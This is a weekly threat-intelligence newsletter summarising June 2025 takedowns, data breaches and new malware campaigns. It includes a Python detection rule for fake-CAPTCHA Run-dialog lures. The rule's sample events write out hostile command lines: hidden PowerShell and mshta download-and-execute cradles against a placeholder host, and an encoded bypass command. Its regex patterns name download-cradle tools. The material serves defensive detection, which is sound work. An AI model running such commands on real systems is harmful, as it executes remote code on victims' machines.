VerSprite Weekly Threat Intelligence
Date Range: 02 June 2025 – 06 June 2025
Issue: 17th Edition
Security Triumphs of the Week
This week marked a series of major victories for global cybersecurity efforts. Microsoft launched a strategic European security initiative to boost international cooperation against cybercrime and protect critical infrastructure. Law enforcement successfully dismantled AVCheck, a vital malware testing platform used by threat actors, severely disrupting their development pipeline. In coordinated global operations, the U.S. Department of Justice seized four domains supporting crypting services and 145 domains linked to the BidenCash carding marketplace. These takedowns represent significant blows to the cybercriminal ecosystem, signaling strengthened international collaboration and proactive disruption of malicious infrastructure.
- Microsoft Unveils European Security Effort to Disrupt Cybercrime Networks
Microsoft has launched a new European security initiative to proactively combat escalating cybercrime across the continent. This initiative will enhance collaboration with law enforcement, EU governments, and private sector entities to dismantle online criminal operations. Microsoft plans to expand threat intelligence sharing, improve incident response, and fortify cloud defenses against transnational cyber threats. It will also focus on protecting critical infrastructure and defending against state-sponsored attackers. This marks a strategic investment in bolstering Europe’s cybersecurity resilience.
Read full article: Gbhackers
- Police Shut Down AVCheck – A Key Malware Development Service
Law enforcement has dismantled AVCheck, a critical underground service used by cybercriminals to test malware against antivirus engines. The platform allowed malware developers to fine-tune their code to avoid detection, making it a core tool for widespread malware deployment. The takedown marks a significant disruption to the cybercriminal supply chain, especially for ransomware and spyware operators. Authorities seized infrastructure and arrested individuals tied to the service’s operation. This action is a huge blow to malware developers worldwide.
Read full article: Cybernews
- U.S. DoJ Seizes 4 Domains Supporting Crypting Services in Global Operation
In a coordinated global crackdown, the U.S. Department of Justice seized four domains providing crypting services to cybercriminals. These services were used to obfuscate malware, helping it bypass security solutions and spread more effectively. The takedown was part of a broader international law enforcement collaboration targeting cyber infrastructure. Authorities have also identified the operators and are pursuing further legal action. This operation sends a strong message to those facilitating the malware economy.
Read full article: Thehackernews
- DoJ Seizes 145 Domains Linked to BidenCash Carding Marketplace
The U.S. Department of Justice executed a major blow against financial cybercrime by seizing 145 domains associated with BidenCash, a notorious carding marketplace. The platform sold stolen credit card data and offered illicit financial services to cybercriminals. This seizure was part of an extensive international takedown involving law enforcement from multiple countries. The action severely disrupts cybercriminal financial ecosystems and helps protect victims of payment data theft.
Read full article: Thehackernews
Security Setbacks of the Week
This week brought several alarming cybersecurity setbacks across multiple sectors. A breach at Next Step Healthcare exposed patients’ sensitive data, including SSNs, medical records, and credit card details. In a separate incident, hackers leaked 86 million AT&T user records with decrypted SSNs, raising serious concerns about identity theft. A sophisticated phishing campaign targeting Armenian civil society and government via Signal was also uncovered, pointing to possible nation-state involvement. Most notably, over 4 billion user records were leaked in one of the largest data breaches ever reported, affecting countless individuals worldwide. These incidents emphasize the urgent need for stronger data protection and cyber resilience measures.
- Next Step Healthcare Data Breach Exposes Sensitive Patient Data
A major breach at Next Step Healthcare has compromised sensitive personal and medical data of patients. Exposed information includes Social Security Numbers (SSNs), medical records, insurance details, and even credit card data. The breach raises serious concerns about patient privacy and the cybersecurity posture of healthcare institutions. While investigations are underway, affected individuals are being notified and offered identity protection services. This incident highlights the continuing vulnerability of healthcare organizations to targeted cyberattacks.
Read full article: Comparitech
- Hackers Leak 86 million AT&T Records with Decrypted SSNs
A devastating leak has exposed data from 86 million AT&T users, including decrypted Social Security Numbers. The leaked information also contains full names, email addresses, dates of birth, and device data, presenting a massive identity theft risk. The breach, allegedly stemming from a prior intrusion, was recently made public by hackers on an underground forum. AT&T has initiated an investigation, though it claims the source of the leak remains unclear. This incident ranks among the largest telecom-related breaches in recent years.
Read full article: Hackread
- Signal Phishing Campaign Targets Armenian Civil Society and Government
A highly targeted phishing campaign exploiting Signal messaging is actively attacking Armenian government officials and civil society members. The attackers use fake login pages and phishing messages to steal credentials and gain access to sensitive conversations and organizational data. The campaign is believed to be state-aligned and showcases sophisticated social engineering tactics. Researchers warn that such phishing operations undermine trust in secure communication platforms and threaten national security interests.
Read full article: Securityonline
- Over 4 billion Records Leaked in One of the Largest Breaches Ever
This week saw one of the largest data leaks in history, with over 4 billion user records exposed online. The leak includes usernames, email addresses, phone numbers, and hashed passwords, affecting a wide range of services globally. Security researchers discovered the massive data trove on an unprotected instance accessible to the public. The origins remain unclear, though the breach is likely a compilation from past data dumps. Experts urge users to update passwords and enable multi-factor authentication immediately.
Read full article: Techradar
The New Emerging Threats
This week saw a surge in sophisticated and deceptive cyber threats. The EDDIESTEALER malware, written in Rust, uses fake CAPTCHA prompts to stealthily steal credentials from unsuspecting users. Ukraine’s infrastructure came under attack from PathWiper, a newly discovered data-wiping malware designed for destruction and likely linked to geopolitical motives. ViperSoftX returned with major enhancements in stealth, modularity, and persistence, making it harder to detect and remove. A scam dubbed HuluCaptcha misleads users into executing malicious PowerShell commands through fake CAPTCHA pages. Meanwhile, Lyrix ransomware emerged with advanced evasion tactics, posing a serious risk to Windows environments. These developments highlight the growing sophistication and variety of cyberattack techniques being deployed globally.
- EDDIESTEALER Infostealer Delivered via Fake CAPTCHA Prompts
A new malware dubbed EDDIESTEALER has emerged, written in Rust and cleverly disguised as a CAPTCHA challenge to steal user credentials. Victims are lured through phishing pages that present fake CAPTCHA forms which silently execute malicious routines. Once executed, the malware exfiltrates login credentials, browser data, and system information to remote servers. Its use of Rust helps it evade many traditional security tools. This campaign underscores the growing trend of using deceptive UX tactics in malware delivery.
Read full article: Securitybrief
- New PathWiper Malware Targets Ukrainian Critical Infrastructure
A destructive new data wiper known as PathWiper has been used in cyberattacks against Ukrainian critical infrastructure in early 2025. The malware is designed to permanently erase files and disable systems, effectively halting operations across impacted sectors. PathWiper’s tactics resemble earlier nation-state wiper attacks but exhibit updated obfuscation techniques and anti-recovery features. Security analysts believe the campaign may be geopolitically motivated.
Read full article: Thehackernews
- ViperSoftX Malware Upgrades Its Modularity and Persistence
The ViperSoftX malware has resurfaced with significant upgrades, including enhanced stealth, modular architecture, and persistent backdoor capabilities. Previously known for its clipboard hijacking and cryptocurrency theft, the new version now embeds itself more deeply into Windows systems. It utilizes PowerShell, obfuscated JavaScript loaders, and multiple persistence layers to remain undetected. These improvements make it harder to remove and ideal for long-term data exfiltration.
Read full article: Cyberpress
- HuluCaptcha Scam Executes Code via Fake CAPTCHA Kit
A new scam called HuluCaptcha tricks users into executing commands on their Windows systems under the guise of a CAPTCHA verification. Victims are presented with a fraudulent CAPTCHA challenge that contains clipboard-pasting instructions, which—if followed—allow malicious PowerShell code execution through the Windows Run dialog. The campaign is primarily distributed through compromised and phishing websites and poses a serious threat to less security-savvy users.
Read full article: Cyberpress
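The HuluCaptcha item above describes the lure in its final step: the victim pastes a clipboard payload into the Windows Run dialog and a PowerShell interpreter starts under explorer.exe. The following is an added detection example written for this newsletter; it is not code from the article or from VerSprite. It runs a simple rule over a constructed batch of process-creation events reduced to the three Sysmon Event ID 1 fields that matter (parent image, image, command line), flagging interpreters spawned by explorer.exe whose command line carries the hidden-window, encoded-command, execution-policy-bypass, download-cradle or remote-URL markers such lures rely on. The event records, the example.invalid host and the base64 blob are all constructed placeholders; the `classify`/`scan` functions and pattern names are this example's own, not a product API.

```python
import re

# Command-line markers a defender would expect in a fake-CAPTCHA / Run-dialog lure.
# All regexes are case-insensitive; the dict order is the order reasons are reported in.
SUSPICIOUS_PATTERNS = {
    "hidden_window":      re.compile(r"-w\w*\s+hidden", re.I),                 # -w / -windowstyle hidden
    "encoded_command":    re.compile(r"-e(?:c|nc|ncodedcommand)?\b", re.I),    # -e / -ec / -enc / -EncodedCommand
    "exec_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle":    re.compile(
        r"\b(?:iex|invoke-expression|downloadstring|downloadfile|iwr|invoke-webrequest|curl|wget)\b", re.I),
    "remote_url":         re.compile(r"https?://", re.I),
}

# Interpreters a Run-dialog lure typically asks the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# The Win+R Run dialog is hosted by explorer.exe, so processes started from it carry that parent.
RUN_DIALOG_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the pattern names matched by one process-creation event, or an
    empty list when the event does not look like a Run-dialog lure. An
    interpreter started from explorer.exe with a clean command line (a user
    simply opening a console) is deliberately not flagged."""
    if basename(event["parent"]) not in RUN_DIALOG_PARENTS:
        return []
    if basename(event["image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(event["cmdline"])]


def scan(events: list) -> list:
    """Run classify() over a sequence of events and return one alert per hit."""
    alerts = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            alerts.append({"index": i, "image": basename(ev["image"]), "reasons": reasons})
    return alerts


# Constructed sample events (not taken from the article). The host example.invalid
# and the base64 string are placeholders, not real indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: classic paste-into-Run lure: hidden window plus a download cradle
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell.exe -w hidden -NoProfile -c "iex (iwr http://example.invalid/check)"'},
    # 1: mshta variant fetching a remote HTA
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/verify.hta"},
    # 2: benign: a user opened a PowerShell console from the Run dialog
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe"},
    # 3: benign: an editor's integrated terminal, not the Run dialog
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS,
     "cmdline": "powershell.exe -NoLogo"},
    # 4: cmd.exe used as a hop into an encoded PowerShell command
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -ep bypass -enc SQBFAFgAIAAuAC4ALgA="},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"event {alert['index']}: {alert['image']} -> {', '.join(alert['reasons'])}")
```

Parent-image gating is what keeps the rule quiet: the same command-line markers appear in plenty of legitimate automation, but an interpreter launched from explorer.exe with a download cradle or an encoded command on its command line is a narrow enough combination to alert on. On a host that has already fired, the Run dialog's history under the user's RunMRU registry key is a useful corroborating artifact, since it records what was actually pasted.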
- Lyrix Ransomware Targets Windows with Advanced Evasion Techniques
A new ransomware strain named Lyrix is actively targeting Windows systems using advanced evasion and anti-analysis features. Lyrix leverages encrypted payload delivery, in-memory execution, and sandbox detection to bypass traditional defenses. Once inside the system, it encrypts user files and demands cryptocurrency ransom payments. The ransomware also includes a custom loader to avoid triggering endpoint detection solutions. Experts warn it could become a major threat to businesses if distributed on a wider scale.
Read full article: Gbhackers
In-Depth Expert CTI Analysis
This week showcased a strong global crackdown on cybercrime infrastructure and a parallel escalation in highly targeted, sophisticated threat campaigns. While Microsoft and international law enforcement led major proactive takedowns, adversaries launched advanced phishing, wiper, and credential-theft malware campaigns, exploiting both human trust and system vulnerabilities. These developments underscore the dual need for strategic alliances and deep technical defense.
Proactive Defense and Strategic Foresight
- Microsoft launched a European cybersecurity initiative to boost cross-border cooperation, threat intel sharing, and critical infrastructure protection.
- Global law enforcement dismantled AVCheck, a malware testing service pivotal to ransomware and spyware development pipelines.
- U.S. DOJ seized 4 crypting service domains and 145 domains tied to the BidenCash carding market, disrupting cybercrime monetization chains.
- These actions represent proactive disruption and an evolving model for multilateral cyber defense.
Evolving Ransomware and Malware Tactics
- EDDIESTEALER abused fake CAPTCHAs to stealthily harvest credentials via deceptive browser prompts.
- ViperSoftX resurfaced with modular, persistent implants leveraging obfuscated loaders and PowerShell scripts.
- Lyrix Ransomware used in-memory execution and sandbox evasion to encrypt systems stealthily.
- PathWiper malware targeted Ukrainian infrastructure, likely geopolitically motivated.
- HuluCaptcha scam executed malicious PowerShell via clipboard trickery disguised as CAPTCHA interaction.
State-Sponsored and Organized Cybercrime Convergence
- Signal phishing targeting Armenian civil society suggests advanced, state-aligned espionage.
- PathWiper and credential-focused phishing reflect strategic intent to cripple and infiltrate.
- AT&T breach (86M users) and Next Step Healthcare attack highlight persistent targeting of high-value PII and critical services.
Operational and Tactical Implications
- 4+ billion records leaked in a massive compilation breach—scope spans countless services.
- Signal-based phishing kits, and fake login campaigns targeting encrypted comms tools, erode trust in secure messaging.
- Dynamic infrastructure and social engineering remain key attacker tools.
Forward-Looking Recommendations
- Deploy real-time, context-aware MFA across all systems.
- Advance regional threat intelligence sharing mechanisms to detect early-stage campaigns.
- Build resilience around phishing-resistant communications; even secure messaging apps can be targeted.
- Automate breach detection based on data exfil patterns and anomalous traffic.